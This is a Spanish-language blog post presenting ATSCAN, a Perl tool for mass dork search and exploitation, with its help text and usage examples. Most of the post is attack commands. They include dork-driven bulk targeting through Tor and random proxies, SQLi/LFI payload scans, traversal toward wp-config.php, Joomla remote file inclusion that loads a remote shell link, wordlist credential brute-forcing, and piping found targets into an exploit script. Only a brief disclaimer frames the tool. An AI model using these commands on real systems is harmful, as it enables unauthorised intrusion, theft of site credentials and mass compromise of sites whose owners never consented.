martes, 16 de julio de 2019

ATSCAN: Búsqueda avanzada / Dorks / Escáner de explotación masiva


¡Alisam Technology no se hace responsable de ningún uso incorrecto, daño causado por este script o ataques contra objetivos sin el consentimiento mutuo previo!

Descripción:
● Motor de búsqueda Google / Bing / Ask / Yandex / Sogou
● Búsqueda masiva de Dork
● Múltiples escaneos instantáneos.
● Explotación de masas
● Utilizar proxy.
● Agente de usuario aleatorio.
● Motor aleatorio.
● Ejecución de comandos externos.
● Escáner XSS / SQLI / LFI / AFD.
● Filtrar los sitios de wordpress y Joomla en el servidor.
● Buscar página de administración.
● Decodificar / Codificar Base64 / MD5
● Exploración de puertos.
● Extraer IPs
● Extraer correos electrónicos.
● Detección automática de errores.
● Detección automática de Cms.
● Publicar datos.
● Repetidor de secuencia automática.
● Validación.
● Publicar y obtener el método
● Y más ...

Bibliotecas para instalar:

Requiere Perl.
Funciona en todas las plataformas. Disponible en sistemas Blackarch Linux y Dracos.

Descargar:


Permisos:

cd atscan
chmod + x ./atscan.pl

Instalación:

chmod + x ./install.sh
./install.sh

Ejecución:

Ejecución portátil: perl ./atscan.pl
Ejecución de la herramienta instalada: atscan

Herramienta de desinstalación:
atscan --uninstall


ScreenShots


 


 

 


Ayuda:

--help / -h / -?
Help.
--proxy
Set tor proxy for scans [EX: --proxy "socks://localhost:9050"]
Set proxy [EX: --proxy "http://12.45.44.2:8080"]
Set proxy list [EX: --proxy list.txt]
-m
Set engine motors default bing EX: -m [Bing: 1][Google: 2][Ask: 3][Yandex: 4][Sogou: 5][All: all]
--proxy-random
Random proxy [EX: --proxy-random list.txt] or --proxy-random "socks://localhost:9050"]
--m-random
Random of all disponibles engines
--b-random
Random all disponibles agents
--freq
Random time frequency (in seconds)
--time
set browser time out
--dork / -d
Dork to search [Ex: house [OTHER]cars [OTHER]hotel]
-t
Target
--level / -l
Scan level (+- Number of page results to scan)
-p
Set test parameter EX:id,cat,product_ID
--save / -s
Output.
--content
Print request content
--data
data. See examples
--post
Use post method
--get
Use get method
--header
Set headers
--host
Domain name [Ex: site.com]
--nobanner
Hide tool banner
--beep
Produce beep sound if positive scan found.
--ifend
Produce beep sound when scan process is finished.
--noinfo
Jump extra results info.
--limit
Limit max positive scan results.
--valid / -v
Validate by string
--status
Validate by http header status
--ifinurl
Get targets with exact string matching
--sregex
Get targets with exact regex matching
--unique
Get targets with exact dork matching
--replace
String to replace
--with
String to replace with
--full
--replace --full Will replace all url parametres from string to the end
--payload
Use your own payloads instead of tool ones
--exp
Exploit/Payload
--sql
Xss scan
--lfi
Local file inclusion
--joomrfi
Scan for joomla local file inclusion.
--shell
--wpafd
Scan wordpress sites for arbitery file download
--admin
Get site admin page
--shost
Get site subdomains
--tcp
TCP port
--udp
UDP port
--sites
Sites in the server
--wp
Wordpress sites in the server
--joom
Joomla sites in the server
--upload
Get sites with upload files in the server
--zip
Get sites with zip files in the server
--md5
Convert to md5
--encode64
Encode base64 string
--decode64
decode base64 string
--TARGET
Will be replaced by target in extern command
--HOST
Will be replaced by host in extern command
--HOSTIP
Will be replaced by host IP in extern command
--PORT
Will be replaced by open port in extern command
--ip
Crawl to get Ips
--regex
Crawl to get strings matching regex
--noquery
Remove string value from Query url [ex: site.com/index.php?id=string]
--command /-c
Extern Command to execute
--email
Get emails
rang(x-y)
EX: --exp "/index.php?id=rang(1-9)" --sql OR -t "site.com/index.php?id=rang(1-9)" --sql
site.com/index.php?id=1 -> 9.
repeat(txt-y)
EX: --exp "/index.php?id=repeat(../-9)wp-config.php" --sql OR -t "site.com/index.php?id=../wp-config.php"
In site.com/index.php?id=../wp-config.php then site.com/index.php?id=../../wp-config.php 9 times
[OTHER]
To separate values ex: dork1 [OTHER]DORK2 [OTHER]DORK3
[DATA/DATAFILE]
To separate data values ex: --data "name:username [DATA]email:xxxxxx [DATA]pass:xxxxx/[DATAFILE]pass:file.txt"
--update
Update tool
--tool
Tool info.
--config
User configuration.
--uninstall
Uninstall Tool.

Ejemplos:

PROXY: 
Tor: --proxy [proxy] [Ex: --proxy socks://localhost:9050].
Proxy: Proxy: --proxy [proxy] Ex: http://12.32.1.5:8080 
or --proxy list.txt Ex: --proxy my_proxies.txt 

RANDOM: 
Random proxy --proxy-random [proxy list.txt] 
Random browser --b-random 
Random engine --m-random 

SET HEADERS: 
atscan --dork [dork / dorks.txt] --level [level] --header "Authorization:Basic YWRtaW46YWRtaW4 [OTHER]keep_alive:1" 
atscan -t target --data "name:userfile[DATAFILE]value:file.txt --post --header "Authorization:Basic YWRtaW46YWRtaW4 [OTHER]keep_alive:1" 

SEARCH ENGINE: 
Search: atscan --dork [dork> --level [level] 
Search: atscan -d [dork> -l [level] 
Set engine: atscan --dork [dork> --level [level] -m [Bing: 1][Google: 2][Ask: 3][Yandex: 4][Sogou: 5][All: all] 
Set selective engines: atscan -d [dork> -l [level] -m 1,2,3.. 
Search with many dorks: atscan --dork [dork1 [OTHER]dork2 [OTHER]dork3> --level [level] 
Search and rand: atscan -d [dork] -l [level] --exp "/index.php?id=rang(1-9)" --sql 
Get Server sites: atscan -t [ip] --level [value] --sites 
Get Server sites: atscan -t "[ip from]-[ip to]" --level [value] --sites 
Get Server sites: atscan -t "ip1 [OTHER]ip2" --level [value] --sites 

Get Server wordpress sites: atscan -t [ip] --level [value] --wp 
Get Server joomla sites: atscan -t [ip] --level value] --joom 
Get Server upload sites: atscan -t [ip] --level [value] --upload 
Get Server zip sites files: atscan -t [ip] --level value] --zip 
WP Arbitry File Download: atscan -t [ip] --level [[[value] --wpafd 
Joomla RFI: atscan -t [ip] --level [10] --joomfri --shell [shell link] 
Search + output: atscan --dork [dorks.txt] --level [level] --save 
Search + get emails: atscan -d [dorks.txt] -l [level] --email 
Search + get site emails: atscan --dork site:site.com --level [level] --email 
Search + get ips: atscan --dork [dork] --level [level] --ip 

REGULAR EXPRESSIONS: 
Regex use: atscan [--dork [dork> / -t [target]] --level [level] --regex [regex] 
IP: ((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){ 3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)) 
E-mails: '((([A-Za-z0-9]+_+)|([A-Za-z0-9]+\-+)|([A-Za-z0-9]+\.+)|([A-Za-z0-9]+\++))*[A-Za-z0-9]+@((\w+\-+)|(\w+\.))*\w{1,63}\.[a-zA-Z]{2,6})' 

REPEATER: 
atscan -t site.com?index.php?id=rang(1-10) --sql 
atscan -t [target] --exp "/index.php?id=rang(1-10)" --sql 
atscan -t [target] --exp "/index.php?id=repeat(../-9)wp-config.php" 

PORTS 
atscan -t [ip] --port [port] [--udp / --tcp] 
atscan -t (ip start)-(ip end) --port [port] [--udp / --tcp] 
atscan -t [ip] --port (port start)-(port end) [--udp / --tcp] --command "your extern command" 

ENCODE / DECODE: 
Generate MD5: --md5 [string] 
Encode base64: --encode64 [string] 
Decode base64: --decode64 [string] 

DATA: 
Post data: atscan -t [target] --data "field1:value1 [DATA]field2:value2 [DATA]field3:value3" [--post / --get]
Wordlist: atscan -t [target] --data "name:userfile [DATAFILE]value:file.txt" [--post / --get]
atscan -t [target] --data "username:john [DATA]pass:1234" [--post / --get]
Post + Validation: --data "name:userfile [DATAFILE]value:file.txt" -v [string] / --status [code] [--post / --get] 

EXTERNAL COMMANDES: 
atscan --dork [dork / dorks.txt] --level [level] --command "curl -v --TARGET" 
atscan --dork [dork / dorks.txt] --level [level] --command "curl -v --HOST" 
atscan --dork [dork / dorks.txt] --level [level] --command "nmap -sV -p 21,22,80 --HOSTIP" 
atscan -d "index of /lib/scripts/dl-skin.php" -l 20 -m 2 --command "php WP-dl-skin.php-exploit.php --TARGET" 

MULTIPLE SCANS: 
atscan --dork [dork> --level [10] --sql --lfi --wp ..
atscan --dork [dork> --level [10] --replace [string] --with [string] --exp [payload] [--sql / --lfi / --wp /...]
atscan -t [ip] --level [10] [--sql / --lfi / --wp /...]
atscan -t [target] [--sql / --lfi / --wp /...] 

USER PAYLOADS: 
atscan --dork [dork] --level [10] [--lfi | --sql ..] --payload [payload | payloads.txt] 

SEARCH VALIDATION: 
atscan -d [dork / dorks.txt] -l [level] --status [code] / --valid [string] 
atscan -d [dork / dorks.txt] -l [level] --ifinurl [string] 
atscan -d [dork / dorks.txt] -l [level] --regex [regex] --valid [string] 
atscan -d [dork / dorks.txt] -l [level] --unique 

SCAN VALIDATION: 
atscan -t [target / targets.txt] [--status [code] / --valid [string] 
atscan -d [dork / dorks.txt] -l [level] --exp [payload] --status [code] / --valid [string] 
atscan -d [dorks.txt] -l [level] --replace [string] --with [string] --status [code] / --valid [string] 
atscan -d [dork / dorks.txt] -l [level] [--admin / --sql ..] --status [code] / --valid [string] 
atscan -d [dorks.txt] -l [level] --replace [string] --with [string] --status [code] / --valid [string] 
atscan -d [dorks.txt] -l [level] --replace [string] --with [string] --full --status [code] / --valid [string] 
atscan -d [dorks.txt] -l [level] --replace [string] --with [string] --exp [payload] --status [code] / --valid [string] 
atscan --data "name:userfile[DATAFILE]value:file.txt" -v [string] / --status [code] [--post / --get]
atscan -d [dork / dorks.txt] -l [level] [--sql / --shost ..] --status [code] / --valid [string] 

UPDATE TOOL: 
atscan --update 

UNINSTALL TOOL: 
atscan --uninstall

Web de la herramienta: https://github.com/
No olvides Compartir... 


Siguenos en twitter: @disoftin


No hay comentarios:

Publicar un comentario

Más leídas este mes